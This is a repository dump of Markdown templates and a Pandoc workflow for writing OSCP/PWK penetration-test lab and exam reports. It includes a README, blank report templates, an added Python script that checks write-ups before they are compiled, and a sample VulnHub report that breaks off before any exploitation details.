├── custom-reference.docx
├── Examples
│   ├── Example Report.pdf
│   ├── Example Report.docx
│   ├── _resources
│   │   ├── 0089524c21be445299eeb07d21069283.png
│   │   ├── 158fecfa36214df8b5c347483a9c4cec.png
│   │   ├── 1d0f9156e6ad477da9dafc9eb736b5f4.png
│   │   ├── 2e4416476b68490a8d24e3d7ef51433f.png
│   │   ├── 3fcfd682f31f487fa15a1e936f6d54e4.png
│   │   ├── 43674b8c9f7f41ea8785d605952406e6.png
│   │   ├── 4a37b0a8091645d7a6b5ebfb1b94710b.png
│   │   ├── 4febeff1e4004089a5034bedfe14517d.png
│   │   ├── 5aaf06cbb9f34198ade6738ce59f6c87.png
│   │   ├── 74774e33076e4483ac3e35d52b3de13b.png
│   │   ├── 78f9b63a3ff44b8dbddeb34bb174f469.png
│   │   ├── 78fa26ae3e3249a3957c46f2c205d667.png
│   │   ├── 7bafa472ec614deabdd9cfca82d1119e.png
│   │   ├── 8b57d11edb854ab1af23239e63b089ef.png
│   │   ├── ab39cd6410114eae9114e8c1aeca9a64.png
│   │   ├── bd626d2837644bc5908d1a10c044bc61.png
│   │   ├── cdaf8cd804cf4f6bbb77f0d6f8362f2c.png
│   │   ├── d77016f6a7eb4770a8c82f92392d9ef7.png
│   │   ├── d980375a0a284cd699d453a2bb24acbb.png
│   │   ├── dc7495e481304f8991d3f2b205ed49f3.png
│   │   ├── dedb017ab57246aab374a65165e16d64.png
│   │   ├── e054884fa6084498bc1ab532725145a5.png
│   │   ├── e6f2888300044268a027062aa4973311.png
│   │   └── e8fa6ab4d5a54bcf8209512d0a54b78c.png
│   └── Example Report _ No Styling.md
├── _resources
│   └── GeneratingReport.png
├── Machine template.md
├── README.md
├── Exam Report template.md
└── Lab Report template.md

--------------------------------------------------------------------------------
/custom-reference.docx:
https://raw.githubusercontent.com/chvancooten/OSCP-MarkdownReportingTemplates/HEAD/custom-reference.docx
--------------------------------------------------------------------------------
/Examples/Example Report.pdf:
https://raw.githubusercontent.com/chvancooten/OSCP-MarkdownReportingTemplates/HEAD/Examples/Example Report.pdf
--------------------------------------------------------------------------------
/Examples/Example Report.docx:
https://raw.githubusercontent.com/chvancooten/OSCP-MarkdownReportingTemplates/HEAD/Examples/Example Report.docx
--------------------------------------------------------------------------------
/_resources/GeneratingReport.png:
https://raw.githubusercontent.com/chvancooten/OSCP-MarkdownReportingTemplates/HEAD/_resources/GeneratingReport.png
--------------------------------------------------------------------------------
/Examples/_resources/0089524c21be445299eeb07d21069283.png:
https://raw.githubusercontent.com/chvancooten/OSCP-MarkdownReportingTemplates/HEAD/Examples/_resources/0089524c21be445299eeb07d21069283.png
--------------------------------------------------------------------------------
/Examples/_resources/158fecfa36214df8b5c347483a9c4cec.png:
https://raw.githubusercontent.com/chvancooten/OSCP-MarkdownReportingTemplates/HEAD/Examples/_resources/158fecfa36214df8b5c347483a9c4cec.png
--------------------------------------------------------------------------------
/Examples/_resources/1d0f9156e6ad477da9dafc9eb736b5f4.png:
https://raw.githubusercontent.com/chvancooten/OSCP-MarkdownReportingTemplates/HEAD/Examples/_resources/1d0f9156e6ad477da9dafc9eb736b5f4.png
--------------------------------------------------------------------------------
/Examples/_resources/2e4416476b68490a8d24e3d7ef51433f.png:
https://raw.githubusercontent.com/chvancooten/OSCP-MarkdownReportingTemplates/HEAD/Examples/_resources/2e4416476b68490a8d24e3d7ef51433f.png
--------------------------------------------------------------------------------
/Examples/_resources/3fcfd682f31f487fa15a1e936f6d54e4.png:
https://raw.githubusercontent.com/chvancooten/OSCP-MarkdownReportingTemplates/HEAD/Examples/_resources/3fcfd682f31f487fa15a1e936f6d54e4.png
--------------------------------------------------------------------------------
/Examples/_resources/43674b8c9f7f41ea8785d605952406e6.png:
https://raw.githubusercontent.com/chvancooten/OSCP-MarkdownReportingTemplates/HEAD/Examples/_resources/43674b8c9f7f41ea8785d605952406e6.png
--------------------------------------------------------------------------------
/Examples/_resources/4a37b0a8091645d7a6b5ebfb1b94710b.png:
https://raw.githubusercontent.com/chvancooten/OSCP-MarkdownReportingTemplates/HEAD/Examples/_resources/4a37b0a8091645d7a6b5ebfb1b94710b.png
--------------------------------------------------------------------------------
/Examples/_resources/4febeff1e4004089a5034bedfe14517d.png:
https://raw.githubusercontent.com/chvancooten/OSCP-MarkdownReportingTemplates/HEAD/Examples/_resources/4febeff1e4004089a5034bedfe14517d.png
--------------------------------------------------------------------------------
/Examples/_resources/5aaf06cbb9f34198ade6738ce59f6c87.png:
https://raw.githubusercontent.com/chvancooten/OSCP-MarkdownReportingTemplates/HEAD/Examples/_resources/5aaf06cbb9f34198ade6738ce59f6c87.png
--------------------------------------------------------------------------------
/Examples/_resources/74774e33076e4483ac3e35d52b3de13b.png:
https://raw.githubusercontent.com/chvancooten/OSCP-MarkdownReportingTemplates/HEAD/Examples/_resources/74774e33076e4483ac3e35d52b3de13b.png
--------------------------------------------------------------------------------
/Examples/_resources/78f9b63a3ff44b8dbddeb34bb174f469.png:
https://raw.githubusercontent.com/chvancooten/OSCP-MarkdownReportingTemplates/HEAD/Examples/_resources/78f9b63a3ff44b8dbddeb34bb174f469.png
--------------------------------------------------------------------------------
/Examples/_resources/78fa26ae3e3249a3957c46f2c205d667.png:
https://raw.githubusercontent.com/chvancooten/OSCP-MarkdownReportingTemplates/HEAD/Examples/_resources/78fa26ae3e3249a3957c46f2c205d667.png
--------------------------------------------------------------------------------
/Examples/_resources/7bafa472ec614deabdd9cfca82d1119e.png:
https://raw.githubusercontent.com/chvancooten/OSCP-MarkdownReportingTemplates/HEAD/Examples/_resources/7bafa472ec614deabdd9cfca82d1119e.png
--------------------------------------------------------------------------------
/Examples/_resources/8b57d11edb854ab1af23239e63b089ef.png:
https://raw.githubusercontent.com/chvancooten/OSCP-MarkdownReportingTemplates/HEAD/Examples/_resources/8b57d11edb854ab1af23239e63b089ef.png
--------------------------------------------------------------------------------
/Examples/_resources/ab39cd6410114eae9114e8c1aeca9a64.png:
https://raw.githubusercontent.com/chvancooten/OSCP-MarkdownReportingTemplates/HEAD/Examples/_resources/ab39cd6410114eae9114e8c1aeca9a64.png
--------------------------------------------------------------------------------
/Examples/_resources/bd626d2837644bc5908d1a10c044bc61.png:
https://raw.githubusercontent.com/chvancooten/OSCP-MarkdownReportingTemplates/HEAD/Examples/_resources/bd626d2837644bc5908d1a10c044bc61.png
--------------------------------------------------------------------------------
/Examples/_resources/cdaf8cd804cf4f6bbb77f0d6f8362f2c.png:
https://raw.githubusercontent.com/chvancooten/OSCP-MarkdownReportingTemplates/HEAD/Examples/_resources/cdaf8cd804cf4f6bbb77f0d6f8362f2c.png
--------------------------------------------------------------------------------
/Examples/_resources/d77016f6a7eb4770a8c82f92392d9ef7.png:
https://raw.githubusercontent.com/chvancooten/OSCP-MarkdownReportingTemplates/HEAD/Examples/_resources/d77016f6a7eb4770a8c82f92392d9ef7.png
--------------------------------------------------------------------------------
/Examples/_resources/d980375a0a284cd699d453a2bb24acbb.png:
https://raw.githubusercontent.com/chvancooten/OSCP-MarkdownReportingTemplates/HEAD/Examples/_resources/d980375a0a284cd699d453a2bb24acbb.png
--------------------------------------------------------------------------------
/Examples/_resources/dc7495e481304f8991d3f2b205ed49f3.png:
https://raw.githubusercontent.com/chvancooten/OSCP-MarkdownReportingTemplates/HEAD/Examples/_resources/dc7495e481304f8991d3f2b205ed49f3.png
--------------------------------------------------------------------------------
/Examples/_resources/dedb017ab57246aab374a65165e16d64.png:
https://raw.githubusercontent.com/chvancooten/OSCP-MarkdownReportingTemplates/HEAD/Examples/_resources/dedb017ab57246aab374a65165e16d64.png
--------------------------------------------------------------------------------
/Examples/_resources/e054884fa6084498bc1ab532725145a5.png:
https://raw.githubusercontent.com/chvancooten/OSCP-MarkdownReportingTemplates/HEAD/Examples/_resources/e054884fa6084498bc1ab532725145a5.png
--------------------------------------------------------------------------------
/Examples/_resources/e6f2888300044268a027062aa4973311.png:
https://raw.githubusercontent.com/chvancooten/OSCP-MarkdownReportingTemplates/HEAD/Examples/_resources/e6f2888300044268a027062aa4973311.png
--------------------------------------------------------------------------------
/Examples/_resources/e8fa6ab4d5a54bcf8209512d0a54b78c.png:
https://raw.githubusercontent.com/chvancooten/OSCP-MarkdownReportingTemplates/HEAD/Examples/_resources/e8fa6ab4d5a54bcf8209512d0a54b78c.png
--------------------------------------------------------------------------------
/Machine template.md:
--------------------------------------------------------------------------------
## System IP XXX.XXX.XXX.XXX (HOSTNAME)

### System overview

| | |
|-------------------|-----------------|
| IP Address | 192.168.255.255 |
| Hostname | ExampleName |
| Exploitation Date | 99-99-9999 |
| Point Value | 25 |

### Exploitation Overview



### Service Enumeration

#### Portscan - TCP

```plaintext

```

#### Portscan - UDP

```plaintext

```

### Network interfaces

```plaintext

```

### Credentials

```plaintext

```

### Exploitation and proof

#### Initial access

##### Vulnerability exploitation

##### Severity

##### Remediation

##### Proof

#### Privilege Escalation

##### Vulnerability exploitation

##### Severity

##### Remediation

##### Proof

### Miscellaneous notes


### Reporting checklist

- [ ] Are screenshots of the proof files together with `ipconfig/ifconfig/ip a` included?
- [ ] Is all *modified* source code included?
- [ ] Are all relevant exploits referenced?
- [ ] Are all steps reproducible?
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
# OSCP / PWK Markdown Reporting Templates and Pandoc Reference Style

I wrote [a blog post](https://casvancooten.com/posts/2020/05/generating-pretty-pwk-reports-with-pandoc-and-markdown-templates-inside/) on how to use these templates to easily generate pretty reports with little effort.

This repo contains the templates I used for OSCP / PWK lab and exam reporting, as well as the basic styles I used to convert the markdown report to a (relatively) slick-looking and organized report, while preserving code formatting and syntax highlighting. To achieve this I generate the PDF based on an intermediary Word file generated through Pandoc.

The repo also contains some [examples](https://github.com/chvancooten/OSCP-MarkdownReportingTemplates/tree/master/Examples) to show what a report may come to look like. Note that the final conversion to Word and PDF does require some manual styling work (which is actually what I personally preferred). Since I obviously cannot disclose any PWK lab or exam writeups, I've used some VulnHub writeups as filler instead. Don't open the example report if you don't want spoilers for `Brainpan`, `Kioptrix2014`, `Zico`, or `LazyAdmin`. 🙃

## Requirements

- A Markdown editor of your choosing
- [Pandoc](https://pandoc.org/)
- `1337 hacking skillz`

## How to use

### Preparing markdown report

The markdown templates are fairly straightforward. I strongly recommend using a Markdown editor that has decent backup / synchronization features as well as a feature to copy and paste screenshots (must-have IMO). I used [Joplin](https://joplinapp.org/) as a daily editor, and [VS Code](https://code.visualstudio.com/docs/languages/markdown) to compile and streamline the final report.

While doing the labs or exam, I would recommend keeping separate write-ups per machine, based on the template you aim to use for reporting. Once you are happy with your separate machine write-ups and ready to compile them into a report, export your markdown files (if needed) and ensure that all the images are intact. Then, compile a master document with an appropriate introduction to, and summary of, your work. For this I have included the Lab and Exam Report templates, which are based on OffSec's own reporting templates.

### Preparing `reference.docx` for custom styling (optional)

The `reference.docx` file determines the basic styling of your intermediate Word document. I have included an example file which covers all the styles, but you can generate and adapt your own if you want.

You can export a reference file as follows:

```
pandoc --print-default-data-file reference.docx > custom-reference.docx
```

Edit the styles embedded in the document as desired to determine how Pandoc will generate your report.

> Don't overlook the many important styles (such as "source code") that are hidden; you can see the full overview by clicking the "box-with-arrow" at the bottom right of the styling section in Word, and edit the styles from there.

### Generating intermediate .docx report

To maintain full control of the output report, I worked with an intermediate report in Word format. You can generate this report as follows. [This article](https://www.garrickadenbuie.com/blog/pandoc-syntax-highlighting-examples/) has a nice and visual representation of the different syntax highlighting styles that Pandoc offers by default.

```
pandoc "Example Report _ No Styling.md" -o output.docx --highlight-style=tango --reference-doc=./custom-reference.docx
```

![Generating the docx report](./_resources/GeneratingReport.png)

### Finalizing the report

The pandoc reference document covers a lot of the styling, but not everything that I wanted it to. As such, I adapted the following manually to ensure that the output document is nice and sleek:

- Title page formatting
- Table of contents
- Page numbering
- Image sizes
  - Since Pandoc renders images at page width by default, some images come out really big depending on the aspect ratio of the original image. This could be solved by using something like `![my caption](./figures/myimage.png){ width=250px }` in your original Markdown file, but I prefer to go through and manually resize images to the right size.

Of course, this is up to your preference! At this point you can tweak your styles or formatting as you desire.
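The steps above leave two things to a careful eye: that every per-machine write-up still has the sections of `Machine template.md` and working image links after export, and that every `##### Proof` section actually carries a screenshot before the master document goes to Pandoc. The script below is an added example, not code from this repository or from its author; it checks write-ups against those points from the Machine template's reporting checklist, joins them into a master document, and prints the Pandoc command from this README. The sample write-ups, the `_resources` screenshot names and the intro heading are constructed for illustration.

```python
"""Check per-machine write-ups against the Machine template, then join them.

Added example, not code from the OSCP-MarkdownReportingTemplates repository.
Sample write-ups and screenshot file names below are constructed.
"""
import re
from pathlib import Path

# Headings every machine write-up should carry, taken from Machine template.md.
REQUIRED_HEADINGS = (
    "### System overview",
    "### Service Enumeration",
    "### Exploitation and proof",
    "#### Initial access",
    "#### Privilege Escalation",
)

# Markdown image syntax ![alt](path), optionally followed by {width=...}.
IMAGE_RE = re.compile(r"!\[[^\]]*\]\(([^)\s]+)\)")


def missing_sections(writeup: str) -> list:
    """Template headings that the write-up does not contain."""
    present = {line.strip() for line in writeup.splitlines()}
    return [h for h in REQUIRED_HEADINGS if h not in present]


def missing_images(writeup: str, base_dir: str, exists=None) -> list:
    """Image references that do not resolve relative to base_dir.

    `exists` defaults to a filesystem check; tests can pass a stand-in.
    """
    exists = exists or (lambda p: Path(p).is_file())
    base = Path(base_dir)
    return [p for p in IMAGE_RE.findall(writeup) if not exists(str(base / p))]


def proof_sections_without_screenshot(writeup: str) -> list:
    """'#### ...' blocks whose '##### Proof' section carries no image.

    Mirrors the checklist item asking for screenshots of the proof files
    together with ipconfig/ifconfig/ip a.
    """
    parent, in_proof, has_image, result = None, False, False, []
    for line in writeup.splitlines() + ["#"]:  # sentinel closes the last section
        if line.startswith("#"):
            if in_proof and not has_image:
                result.append(parent)
            in_proof = line.strip() == "##### Proof"
            has_image = False
            if line.startswith("#### "):  # level-4 heading names the block
                parent = line.strip()
        elif in_proof and IMAGE_RE.search(line):
            has_image = True
    return result


def checklist(writeup: str, base_dir: str, exists=None) -> dict:
    """Run all checks; every list is empty when the write-up is ready to compile."""
    return {
        "missing_sections": missing_sections(writeup),
        "missing_images": missing_images(writeup, base_dir, exists),
        "proof_without_screenshot": proof_sections_without_screenshot(writeup),
    }


def assemble_master(intro: str, writeups: list) -> str:
    """Join the intro and the write-ups; each '## System IP ...' heading becomes
    a sub-chapter of the intro's '# Exploitation Details' chapter."""
    return "\n\n".join(part.strip() for part in [intro, *writeups]) + "\n"


def pandoc_argv(master_md: str, out_docx: str,
                reference: str = "./custom-reference.docx") -> list:
    """The Pandoc command line from the README for the intermediate .docx."""
    return ["pandoc", master_md, "-o", out_docx,
            "--highlight-style=tango", f"--reference-doc={reference}"]


# Constructed sample write-ups (hosts taken from the example report's overview).
COMPLETE_WRITEUP = """## System IP 10.0.0.138 (BrainPan)
### System overview
### Service Enumeration
### Exploitation and proof
#### Initial access
##### Proof
![local.txt with ifconfig](./_resources/brainpan-local.png)
#### Privilege Escalation
##### Proof
![proof.txt with ifconfig](./_resources/brainpan-proof.png)
"""

INCOMPLETE_WRITEUP = """## System IP 10.0.0.139 (Kioptrix2014)
### System overview
### Exploitation and proof
#### Initial access
##### Proof
Got the flag; screenshot still to be added.
"""

if __name__ == "__main__":
    for w in (COMPLETE_WRITEUP, INCOMPLETE_WRITEUP):
        print(w.splitlines()[0], checklist(w, "."))
    print(" ".join(pandoc_argv("master.md", "output.docx")))
```

Run it from the directory that holds your exported write-ups and `_resources` folder so the image check consults the real files; `assemble_master` takes the Lab or Exam template text as the intro and the checked write-ups as the list.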
58 | 59 | ### Exporting PDF 60 | 61 | OffSec expects your report in PDF format. Generating that from Word shouldn't be much of a hurdle though. ;) 62 | -------------------------------------------------------------------------------- /Exam Report template.md: -------------------------------------------------------------------------------- 1 | # Offensive Security - Penetration Test Report for OSCP Exam 2 | 3 | 4 | [email@email.email] 5 | OSID: [OS-XXXXX] 6 | [Date] 7 | 8 | # Table of Contents 9 | 10 | # Outline 11 | 12 | ## Introduction 13 | 14 | The Offensive Security Lab penetration test report contains all efforts that were conducted in order to pass the Offensive Security OSCP Certification Exam. This report will be graded from a standpoint of correctness and fullness to all aspects of the Exam Lab. The purpose of this report is to ensure that the student has a full understanding of penetration testing methodologies as well as the technical knowledge to pass the qualifications for the Offensive Security Certified Professional. 15 | 16 | ## Objective 17 | 18 | The objective of this assessment is to perform an internal penetration test against the Offensive Security Exam network. The student is tasked with following a methodical approach in obtaining access to the objective goals. This test should simulate an actual penetration test and how you would start from beginning to end, including the overall report. 
19 | 20 | ## Requirements 21 | 22 | The student will be required to fill out this penetration testing report fully and to include the following sections: 23 | 24 | - Overall High-Level Summary and Recommendations (non-technical) 25 | - Methodology walkthrough and detailed outline of steps taken 26 | - Each finding with included screenshots, walkthrough, sample code, and proof.txt if applicable 27 | - Any additional items that were not included 28 | 29 | # High-Level Summary 30 | 31 | The author of this report was tasked with performing an internal penetration test towards the Offensive Security Exam Lab environment. An internal penetration test is a dedicated offensive simulation against internally connected systems. The focus of this test is to perform attacks, similar to those of a malicious hacker and attempt to infiltrate Offensive Security’s internal Exam Lab systems. The overall objective was to evaluate the network, identify systems, and exploit vulnerabilities, ultimately reporting findings back to Offensive Security. 32 | 33 | 34 | During the assessment, several alarming vulnerabilities were identified on Offensive Security’s exam network. When performing the attacks, the author was able to gain access to multiple machines, primarily due to outdated patches and poor security configurations. During the tests, XXXXXXX systems were succesfully compromised, granting full control over every system in the network. These systems, as well as a brief description on how access was obtained, are listed in the section below. 35 | 36 | ## Overview of Compromised Machines 37 | 38 | It should be noted that this section solely provides a high-level description of the vulnerability which was exploited to gain a foothold on the machine. For details on lateral movement and privilege escalation within each box, please refer to the details provided in the ‘exploitation details’ chapters. 
39 | 40 | 41 | - **X.X.X.X (Hostname)** - *Xpts* - VULNERABILITY SUMMARY 42 | - **X.X.X.X (Hostname)** - *Xpts* - VULNERABILITY SUMMARY 43 | - **X.X.X.X (Hostname)** - *Xpts* - VULNERABILITY SUMMARY 44 | - **X.X.X.X (Hostname)** - *Xpts* - VULNERABILITY SUMMARY 45 | - **X.X.X.X (Hostname)** - *Xpts* - Remote (Custom) Buffer Overflow 46 | 47 | ## Recommendations 48 | 49 | It is strongly recommended to patch the vulnerabilities identified during the testing to ensure that an attacker cannot exploit these systems in the future. For each identified vulnerability, patching recommendations are provided in the following chapters. 50 | 51 | One thing to note is that these systems require frequent patching and once patched, should remain on a regular patch program to protect additional vulnerabilities that are discovered at a later date. 52 | 53 | # Methodologies 54 | 55 | A widely adopted approach to performing penetration testing was utilized during the tests to test how well the Offensive Security Lab environments are secured. In this chapter, a breakdown of of the used methodology is provided. 56 | 57 | ## Information Gathering 58 | 59 | The information gathering portion of a penetration test focuses on identifying the scope of the penetration test. During this penetration test, the objective was to exploit the exam network. One IP range was in scope: 60 | 61 | 62 | - IP RANGE (X.X.X.X) 63 | 64 | As part of the Information Gathering phase, both passive and active scans were performed to gather information about open ports and running services. 65 | 66 | ## Penetration 67 | 68 | The penetration testing portions of the assessment focus on gaining access to a variety of systems. During this penetration test, **[X]** out of **5** systems were succesfully and completely compromised. 
The next chapters provide an overview of the identified services and exploited vulnerabilities for every machine, as well as the proof keys for every compromised machine and recommendations for mitigating the identified vulnerabilities. 69 | 70 | 71 | It should be noted that the Metasploit Framework was utilised for one box during the execution of these tests. The IP address chosen for Metasploit usage was **[XXX.XXX.XXX.XXX]**. 72 | 73 | ## Maintaining Access 74 | 75 | Maintaining access to a system is important to attackers, ensuring that access to a system can be regained after it has been exploited is invaluable. 76 | The 'maintaining access' phase of the penetration test focuses on ensuring that once the attack has been executed, an attacker can easily regain administrative access over the system. Additionally, certain exploits may only be executable once. As such, having a foothold into a system proves invaluable. 77 | 78 | ## Lateral Movement 79 | 80 | As part of the engagement, exploitation in closed subnets was requested by Offensive Security, requiring lateral movement from compromised hosts. Furthermore, lateral movement within subnets was realized through the use of known credentials from compromised hosts. Technical details on lateral movement are provided in the next chapter, and a full overview of compromised credentials is provided in the appendix. 81 | 82 | ## House Cleaning 83 | 84 | The 'house cleaning' portions of the assessment ensures that remnants of the penetration test are removed. 85 | Often fragments of tools or user accounts are left on an organization's computer which can cause security issues down the road. 86 | Ensuring that no remnants of our penetration test are left over is important. 87 | 88 | After all proof keys were collected from the lab networks, all user accounts, passwords, as well as the Meterpreter services installed on the system were removed. 
Offensive Security should not have to remove any additional backdoors, user accounts, or files from the system. 89 | 90 | # Exploitation Details 91 | 92 | -------------------------------------------------------------------------------- /Lab Report template.md: -------------------------------------------------------------------------------- 1 | # Offensive Security - Penetration Test Report for PWK Internal Labs 2 | 3 | 4 | [email@email.email] 5 | OSID: [OS-XXXXX] 6 | [Date] 7 | 8 | # Outline 9 | ## Introduction 10 | 11 | The Offensive Security Lab penetration test report contains all efforts that were conducted in order to pass the Offensive Security Lab. This report will be graded from a standpoint of correctness and fullness to all aspects of the Lab. The purpose of this report is to ensure that the student has a full understanding of penetration testing methodologies as well as the technical knowledge to pass the qualifications for the Offensive Security Certified Professional. 12 | 13 | ## Objective 14 | 15 | The objective of this assessment is to perform an internal penetration test against the Offensive Security Lab network. The student is tasked with following a methodical approach in obtaining access to the objective goals. This test should simulate an actual penetration test and how you would start from beginning to end, including the overall report. An example page has already been created for you at the latter portions of this document that should give you ample information on what is expected to pass this course. Use the sample report as a guideline to get you through the reporting. 
16 | 17 | ## Requirements 18 | 19 | The student will be required to fill out this penetration testing report fully and to include the following sections: 20 | 21 | - Overall High-Level Summary and Recommendations (non-technical) 22 | - Methodology walkthrough and detailed outline of steps taken 23 | - Each finding with included screenshots, walkthrough, sample code, and proof.txt if applicable 24 | - Any additional items that were not included 25 | 26 | # High-Level Summary 27 | 28 | The author of this report was tasked with performing an internal penetration test towards the Offensive Security Lab environment. An internal penetration test is a dedicated offensive simulation against internally connected systems. The focus of this test is to perform attacks, similar to those of a malicious hacker and attempt to infiltrate Offensive Security’s internal Lab systems – including but not limited to the THINC.local domain. The overall objective was to evaluate the network, identify systems, and exploit vulnerabilities, ultimately reporting findings back to Offensive Security. 29 | 30 | During the assessment, several alarming vulnerabilities were identified on Offensive Security’s networks. When performing the attacks, the author was able to gain access to multiple machines, primarily due to outdated patches and poor security configurations. During the tests, all systems were succesfully compromised, granting full control over every system in the network. These systems, as well as a brief description on how access was obtained, are listed in the section below. 31 | 32 | ## Overview of Compromised Machines 33 | 34 | It should be noted that this section solely provides a high-level description of the vulnerability which was exploited to gain a foothold on the machine. For details on lateral movement and privilege escalation within each box, please refer to the details provided in the ‘exploitation details’ chapters. 
35 | 36 | 37 | **Public Subnet** 38 | 39 | - X.X.X.X (Hostname) - Initial Vulnerability 40 | 41 | **Other Subnet** 42 | 43 | - X.X.X.X (Hostname) - Initial Vulnerability 44 | 45 | **Other Subnet** 46 | 47 | - X.X.X.X (Hostname) - Initial Vulnerability 48 | 49 | **Other Subnet** 50 | 51 | - X.X.X.X (Hostname) - Initial Vulnerability 52 | 53 | ## Recommendations 54 | 55 | It is strongly recommended to patch the vulnerabilities identified during the testing to ensure that an attacker cannot exploit these systems in the future. For each application, patching recommendations are provided. 56 | 57 | One thing to note is that these systems require frequent patching and once patched, should remain on a regular patch program to protect additional vulnerabilities that are discovered at a later date. 58 | 59 | # Methodologies 60 | 61 | A widely adopted approach to performing penetration testing was utilized during the tests to test how well the Offensive Security Lab environments are secured. 62 | Below, a breakdown of the applied methodology is provided. 63 | 64 | ## Information Gathering 65 | 66 | The information gathering portion of a penetration test focuses on identifying the scope of the penetration test. During this penetration test, the objective was to exploit the exam network. Three IP ranges were in scope: 67 | 68 | 69 | - The 'Public' subnet: X.X.X.X/24 70 | - Another subnet: X.X.X.X/24 71 | 72 | As part of the Information Gathering phase, both passive and active scans were performed to gather information about open ports and running services. 73 | 74 | ## Penetration 75 | 76 | 77 | The penetration testing portions of the assessment focus on gaining access to a variety of systems. During this penetration test, **[X]** out of **67** systems were succesfully and completely compromised. 
The next chapters provide an overview of the identified services and exploited vulnerabilities for every machine, as well as the proof keys for every compromised machine and recommendations for mitigating the identified vulnerabilities. 78 | 79 | ## Maintaining Access 80 | 81 | Maintaining access to a system is important to attackers, ensuring that access to a system can be regained after it has been exploited is invaluable. 82 | The 'maintaining access' phase of the penetration test focuses on ensuring that once the attack has been executed, an attacker can easily regain administrative access over the system. Additionally, certain exploits may only be executable once. As such, having a foothold into a system proves invaluable. 83 | 84 | ## Lateral Movement 85 | 86 | As part of the engagement, exploitation in closed subnets was requested by Offensive Security, requiring lateral movement from compromised hosts. Furthermore, lateral movement within subnets was realized through the use of known credentials from compromised hosts. Technical details on lateral movement are provided in the next chapter, and a full overview of compromised credentials is provided in the appendix. 87 | 88 | ## House Cleaning 89 | 90 | The 'house cleaning' portions of the assessment ensures that remnants of the penetration test are removed. 91 | Often fragments of tools or user accounts are left on an organization's computer which can cause security issues down the road. 92 | Ensuring that no remnants of our penetration test are left over is important. 93 | 94 | After all proof keys were collected from the lab networks, all user accounts, passwords, as well as the Meterpreter services installed on the system were removed. Offensive Security should not have to remove any additional backdoors, user accounts, or files from the system. 

# Exploitation Details: Public Subnet (X.X.X.X/24)



# Exploitation Details: Public Subnet (X.X.X.X/24)



# Appendix A - Lab Exercises



# Appendix B - Compromised Credentials

As part of the engagement, several sets of credentials were found on compromised machines. Some credentials were found in hashed form and cracked, indicating the weakness of these credentials. For the sake of full disclosure, these credentials are disclosed below. Note that they should be rotated as soon as possible.

## Personal accounts
```plaintext
CREDENTIALS:HERE
```

## Non-personal accounts
```plaintext
CREDENTIALS:HERE
```

--------------------------------------------------------------------------------
/Examples/Example Report _ No Styling.md:
--------------------------------------------------------------------------------

# Example Report - Penetration Test Report for VulnHub Internal Labs

me@localhost

SOME-1D3NT1F13R

Today

# Outline
## Introduction

The Example Lab penetration test report contains all efforts that were conducted in order to pass The Example Lab. This report will be graded from a standpoint of correctness and fullness to all aspects of the Lab. The purpose of this report is to ensure that the student has a full understanding of penetration testing methodologies as well as technical knowledge.

## Objective

The objective of this assessment is to perform an internal penetration test against the Example Lab network. The student is tasked with following a methodical approach in obtaining access to the objective goals. This test should simulate an actual penetration test and how you would start from beginning to end, including the overall report. An example page has already been created for you at the latter portions of this document that should give you ample information on what is expected to pass this course. Use the sample report as a guideline to get you through the reporting.

## Requirements

The student will be required to fill out this penetration testing report fully and to include the following sections:

- Overall High-Level Summary and Recommendations (non-technical)
- Methodology walkthrough and detailed outline of steps taken
- Each finding with included screenshots, walkthrough, sample code, and proof.txt if applicable
- Any additional items that were not included

# High-Level Summary

The author of this report was tasked with performing an internal penetration test towards The Example Lab environment. An internal penetration test is a dedicated offensive simulation against internally connected systems. The focus of this test is to perform attacks, similar to those of a malicious hacker, and attempt to infiltrate internal Lab systems – including but not limited to the internal domain. The overall objective was to evaluate the network, identify systems, and exploit vulnerabilities, ultimately reporting back findings.

During the assessment, several alarming vulnerabilities were identified on internal networks. When performing the attacks, the author was able to gain access to multiple machines, primarily due to outdated patches and poor security configurations. During the tests, all systems were successfully compromised, granting full control over every system in the network. These systems, as well as a brief description of how access was obtained, are listed in the section below.

## Overview of Compromised Machines

It should be noted that this section solely provides a high-level description of the vulnerability which was exploited to gain a foothold on the machine. For details on lateral movement and privilege escalation within each box, please refer to the details provided in the 'exploitation details' chapters.

- 10.0.0.138 (BrainPan) - Buffer Overflow
- 10.0.0.139 (Kioptrix2014) - Local File Inclusion and remote code execution
- 10.0.100.105 (Zico) - Default credentials and arbitrary file write
- 10.0.100.107 (LazyAdmin) - Misconfigured SMB share and weak credentials

## Recommendations

It is strongly recommended to patch the vulnerabilities identified during the testing to ensure that an attacker cannot exploit these systems in the future. For each application, patching recommendations are provided.

One thing to note is that these systems require frequent patching and, once patched, should remain on a regular patch program to protect against additional vulnerabilities that are discovered at a later date.

# Methodologies

A widely adopted approach to performing penetration testing was utilized during the tests to test how well The Example Lab environments are secured.
Below, a breakdown of the applied methodology is provided.

## Information Gathering

The information gathering portion of a penetration test focuses on identifying the scope of the penetration test. During this penetration test, the objective was to exploit the exam network. One IP range is in scope:

- The 'internal' subnet: 10.0.0.0/16

As part of the Information Gathering phase, both passive and active scans were performed to gather information about open ports and running services.

## Penetration

The penetration testing portions of the assessment focus on gaining access to a variety of systems. During this penetration test, **4** out of **4** systems were successfully and completely compromised. The next chapters provide an overview of the identified services and exploited vulnerabilities for every machine, as well as the proof keys for every compromised machine and recommendations for mitigating the identified vulnerabilities.

## Maintaining Access

Maintaining access to a system is important to attackers; ensuring that access to a system can be regained after it has been exploited is invaluable.
The 'maintaining access' phase of the penetration test focuses on ensuring that once the attack has been executed, an attacker can easily regain administrative access over the system. Additionally, certain exploits may only be executable once. As such, having a foothold into a system proves invaluable.

## Lateral Movement

As part of the engagement, exploitation in closed subnets was requested, requiring lateral movement from compromised hosts. Furthermore, lateral movement within subnets was realized through the use of known credentials from compromised hosts. Technical details on lateral movement are provided in the next chapter, and a full overview of compromised credentials is provided in the appendix.

## House Cleaning

The 'house cleaning' portion of the assessment ensures that remnants of the penetration test are removed.
Often fragments of tools or user accounts are left on an organization's computer, which can cause security issues down the road.
Ensuring that no remnants of our penetration test are left over is important.

After all proof keys were collected from the lab networks, all user accounts, passwords, as well as the Meterpreter services installed on the system were removed. No additional cleanup should be required.

# Exploitation Details: Internal Subnet (10.0.0.0/16)

## System IP 10.0.0.138 (Brainpan)

### System overview

|                   |                 |
|-------------------|-----------------|
| IP Address        | 10.0.0.138      |
| Hostname          | Brainpan        |
| Exploitation Date | 04-05-2020      |
| Point Value       | N/A             |

### Exploitation Overview

